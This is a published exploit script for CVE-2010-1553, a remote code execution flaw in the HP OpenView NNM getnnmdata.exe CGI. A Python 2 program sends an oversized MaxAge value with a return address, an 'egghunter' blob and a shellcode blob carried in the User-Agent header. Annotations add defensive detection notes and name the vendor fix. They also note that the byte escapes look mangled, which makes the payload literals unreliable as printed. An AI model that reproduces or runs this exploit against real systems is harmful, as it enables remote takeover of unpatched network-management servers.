
# Title : HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution
# Published : 2010-07-02
# Author : S2 Crew


# Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution 
# Date: 2010.07.02
# Author: S2 Crew [Hungary]
# Software Link: hp.com
# Version: 7.53
# Tested on: Windows 2003
# CVE: CVE-2010-1553

# Code :

#!/usr/bin/python

import struct
import socket
import httplib
import urllib

# calc.exe Windows Execute Command
# Payload bytes the author labels as a calc.exe launcher. They are not part
# of the POST body: they are appended to the User-Agent header below (see
# `h`), so on the wire this blob travels inside an HTTP request header.
# NOTE(review): the byte-escape sequences throughout this listing appear to
# have been mangled during extraction; as printed, these literals are plain
# ASCII text rather than the byte sequences the comments describe.
sc2 = (
"x89xe7xdbxc4xd9x77xf4x5ax4ax4ax4ax4ax4ax4ax4a"
"x4ax4ax4ax4ax43x43x43x43x43x43x37x52x59x6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b"
"x4cx4ax48x4cx49x47x70x43x30x45x50x51x70x4fx79"
"x4dx35x50x31x4bx62x43x54x4ex6bx51x42x46x50x4e"
"x6bx50x52x46x6cx4ex6bx51x42x46x74x4cx4bx43x42"
"x47x58x46x6fx4fx47x42x6ax46x46x44x71x4bx4fx44"
"x71x4fx30x4ex4cx47x4cx51x71x51x6cx46x62x44x6c"
"x45x70x4fx31x48x4fx44x4dx47x71x4ax67x4ax42x4c"
"x30x43x62x46x37x4cx4bx50x52x44x50x4cx4bx42x62"
"x45x6cx45x51x4ex30x4cx4bx47x30x50x78x4ex65x4b"
"x70x43x44x43x7ax43x31x4ax70x46x30x4ex6bx51x58"
"x42x38x4cx4bx46x38x47x50x43x31x4bx63x4bx53x47"
"x4cx42x69x4cx4bx45x64x4cx4bx45x51x4ax76x46x51"
"x4bx4fx45x61x49x50x4cx6cx4ax61x48x4fx44x4dx45"
"x51x4ax67x47x48x4bx50x44x35x4bx44x44x43x43x4d"
"x4ax58x47x4bx43x4dx51x34x51x65x4dx32x42x78x4c"
"x4bx43x68x47x54x47x71x4ax73x51x76x4cx4bx46x6c"
"x50x4bx4ex6bx42x78x45x4cx45x51x49x43x4cx4bx47"
"x74x4ex6bx47x71x4ex30x4dx59x47x34x46x44x44x64"
"x51x4bx43x6bx50x61x42x79x42x7ax50x51x49x6fx49"
"x70x43x68x51x4fx51x4ax4ex6bx45x42x4ax4bx4dx56"
"x43x6dx50x6ax47x71x4cx4dx4cx45x4ex59x45x50x45"
"x50x45x50x50x50x43x58x45x61x4ex6bx42x4fx4bx37"
"x4bx4fx4ax75x4dx6bx4cx30x4cx75x49x32x42x76x50"
"x68x4dx76x4ax35x4fx4dx4fx6dx4bx4fx49x45x47x4c"
"x43x36x51x6cx45x5ax4bx30x49x6bx4bx50x43x45x45"
"x55x4dx6bx42x67x47x63x51x62x42x4fx50x6ax45x50"
"x51x43x4bx4fx4bx65x45x33x43x51x50x6cx45x33x46"
"x4ex43x55x51x68x50x65x43x30x45x5ax41x41"
)

# Second, shorter blob; the author's name for it ("egghunter") is the only
# description the page gives. It is placed at the tail of the POST body.
egghunter = (
"x89xe1xdaxd7xd9x71xf4x5bx53x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x50x66x4fx71x4bx7ax49x6fx46x6fx50x42x51x42x43"
"x5ax45x52x43x68x48x4dx46x4ex45x6cx47x75x42x7a"
"x44x34x48x6fx4ex58x42x74x50x30x46x50x42x77x4c"
"x4bx4ax5ax4ex4fx43x45x4ax4ax4cx6fx43x45x4ax47"
"x49x6fx4bx57x41x41"
)

# 32-bit little-endian encoding of the address 0x5A667A77. The author's
# "ppr" comment presumably stands for a pop/pop/ret gadget; that cannot be
# verified from this listing.
ret = struct.pack('<L',0x5A667A77) # ppr
# Four-character string inserted between the 'A' filler and `ret`.
jmp = "x74x21x44x44"

# POST body. Topo and SnmpLastVal are placeholders; MaxAge is 2054 filler
# bytes followed by jmp, ret, 30 more filler bytes and the egghunter blob.
# The title attributes the code execution to an invalid MaxAge value, and
# the one built here is over 2 KB long - a POST to /OvCgi/getnnmdata.exe
# with a MaxAge value of that size is far outside normal use and is a
# straightforward thing to alert on. The remedy is the vendor fix for
# CVE-2010-1553 named in the header.
p = 'Topo=X&SnmpLastVal=X&MaxAge='+'A'*2054 + jmp + ret + 'B' * 30 + egghunter

# Request headers. Host is hard-coded to the lab address 172.16.29.149, and
# the User-Agent is the marker "T00WT00W" with sc2 appended, so the payload
# rides in a header rather than the body; a User-Agent carrying raw binary
# is itself an anomaly worth flagging at the proxy or IDS.
h = {"Content-Type": "application/x-www-form-urlencoded","Host":"172.16.29.149","User-Agent":"T00WT00W"+sc2}

# Python 2 httplib (print statements below): one POST to the CGI, then the
# status line, the response body and a final marker are printed. No timeout
# is passed to HTTPConnection, so a host that never answers can block the
# script indefinitely.
c = httplib.HTTPConnection('172.16.29.149')
c.request("POST","/OvCgi/getnnmdata.exe",p,h)
r = c.getresponse()

print r.status, r.reason
data = r.read()
print data
c.close()

print "nDonen"